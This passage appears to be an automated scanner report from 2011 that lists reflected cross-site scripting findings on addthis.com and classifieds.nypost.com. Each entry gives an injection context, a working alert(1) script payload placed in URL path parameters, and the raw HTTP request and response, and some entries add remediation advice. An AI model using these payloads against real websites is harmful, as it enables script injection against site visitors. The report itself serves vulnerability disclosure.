GET /1f44e"-alert(1)-"ddd92bfa15c/api-spec HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:29:06 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=67apvckijqd1n3dakhe47gj2v3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1491 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/1f44e"-alert(1)-"ddd92bfa15c/api-spec"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ca3d4<script>alert(1)</script>6cf201a68e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ca3d4<script>alert(1)</script>6cf201a68e3/api-spec HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:29:06 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=qhq4ppcjjjl2bsbdltnemiu286; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1517 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>ca3d4<script>alert(1)</script>6cf201a68e3/api-spec</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ae90"-alert(1)-"75ea719bdbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /help/3ae90"-alert(1)-"75ea719bdbc HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 02:29:07 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=3opilfmv6jbpkpmnnl0eimkdo3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mouser=cl; expires=Thu, 10-Mar-2011 02:29:07 GMT; path=/ Vary: Accept-Encoding imagetoolbar: no Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 13227
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>AddThis - He ...[SNIP]... <script type="text/javascript"> var u = "/404/help/3ae90"-alert(1)-"75ea719bdbc"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
1.123. http://www.classifieds.nypost.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.classifieds.nypost.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56b59"><script>alert(1)</script>77953b7e1b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?56b59"><script>alert(1)</script>77953b7e1b6=1 HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 02:31:32 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=255a3ec63add34e23ab755c3f6c4629c; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=a970c04805fa35927fbfe1ae2885bae2; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1BMUYxMzAyMDRENTBBQjA0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjI5Mjt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 35071
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17416"-alert(1)-"93c06369d93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /housing17416"-alert(1)-"93c06369d93/rent/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:13 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=b0fb135493699c46be397d18ce480f53; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=b67f3e84c70532592b61bdc82670e8ff; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1BRDA3RTVDRTRENTBBQjJE; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzMzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 787a0"><script>alert(1)</script>939c43a6910 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing787a0"><script>alert(1)</script>939c43a6910/rent/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:13 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=09aa001fc39530364a26f37b52cd4f0f; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=0c409366fcf638731c51c1f5013fd790; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1ERDk0OUEwNjRENTBBQjJE; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzMzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 628b8"-alert(1)-"959f4c4a5eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /housing/rent628b8"-alert(1)-"959f4c4a5eb/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:19 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=dab3bbbe5cc49116e0ff796dec2beddb; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=c92e4eb35e8ac0c1594a8106715c765e; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1BNDE3NTMxNTRENTBBQjMz; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzOTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5d45"><script>alert(1)</script>91ce77e36d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing/rentf5d45"><script>alert(1)</script>91ce77e36d2/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:18 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=f71e3c13c8b2a4cbb7187684e907c962; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=1ce0df756b7d35d426f19249f48a1e8e; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1BNTBFNDJDRTRENTBBQjMy; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzODt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98452"-alert(1)-"777efafcfa1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /housing98452"-alert(1)-"777efafcfa1/rent/apartment/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:18 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=92afa041b3ea2471b6a3571b6b151996; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=95127b5a9b8f19ca470fccd840497fc4; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1BMDRFQjdDODRENTBBQjMy; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzODt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 851ae"><script>alert(1)</script>1c7a28410d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing851ae"><script>alert(1)</script>1c7a28410d9/rent/apartment/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:17 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=9a1ec2d606ef9a4217b314b63ce5e085; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=5cebecd73600e2dc6b8c1976837b347a; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1CQjNCREM4MDRENTBBQjMx; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzNzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b443f"><script>alert(1)</script>8c392b4b01f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing/rentb443f"><script>alert(1)</script>8c392b4b01f/apartment/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:22 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=bcadb1d7fe1457d766d3a1b415f427ce; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=ac590ce48349d97c6bd214da4ec048ae; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1DOEVEQTAxQjRENTBBQjM2; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0Mjt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c600f"-alert(1)-"631c9dfd9db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /housing/rentc600f"-alert(1)-"631c9dfd9db/apartment/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:23 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=5482e30b7b9520e50113f93adb559204; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=155c1216dec18cdafb4a8da22a88354e; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1CMDQ4Nzk5RTRENTBBQjM3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0Mzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b58ca"-alert(1)-"8e650569f43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /housingb58ca"-alert(1)-"8e650569f43/sale/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:13 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=8952cebcccddb05b0b492258310e65a7; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=331826cc99afffbcfd3192501f85945d; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1BMTRFMDhGMzRENTBBQjJE; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzMzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af3af"><script>alert(1)</script>2383bc7b4a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housingaf3af"><script>alert(1)</script>2383bc7b4a2/sale/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:12 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=961547882d20431006d8d55ec5c46ae3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=f6ff5b4fb7e61d07ff00b5c57df4f4bb; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1DRjNEQUNFOTRENTBBQjJD; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzMjt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 743bf"><script>alert(1)</script>52416edc729 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing/sale743bf"><script>alert(1)</script>52416edc729/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:17 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=7241134d9ecf06edd355e33e951acb8e; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=99a9d42109e00a1cc41bed07afbb7f90; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1BRjk3OEI1MjRENTBBQjMx; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzNzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b04a"-alert(1)-"4c9628f7613 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /housing/sale6b04a"-alert(1)-"4c9628f7613/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:18 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=7d33cd61f00586135bbc01d6d97811c5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=07f8cec03af577aa1f8a737e2a4722b3; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1FQ0REMDVFNzRENTBBQjMy; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzODt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8051f"><script>alert(1)</script>ed0505c2ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job8051f"><script>alert(1)</script>ed0505c2ef/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:17 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=2fcc6d8406f32b4ddedd916b82be58de; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=dfc2d0d6bde6021f66f784fa161ab08e; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1GNjY2RTk2RTRENTBBQjMx; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzNzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aabde"-alert(1)-"983a4a707fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jobaabde"-alert(1)-"983a4a707fc/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:18 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=3725793ad5984417584a0b67ffa68f4c; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=6c8b26b153ab3ddfad61fb4837579c0d; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1FRDg3MzhCQTRENTBBQjMy; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzODt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e7c0"-alert(1)-"9d75c7c2cd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /post1e7c0"-alert(1)-"9d75c7c2cd1/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
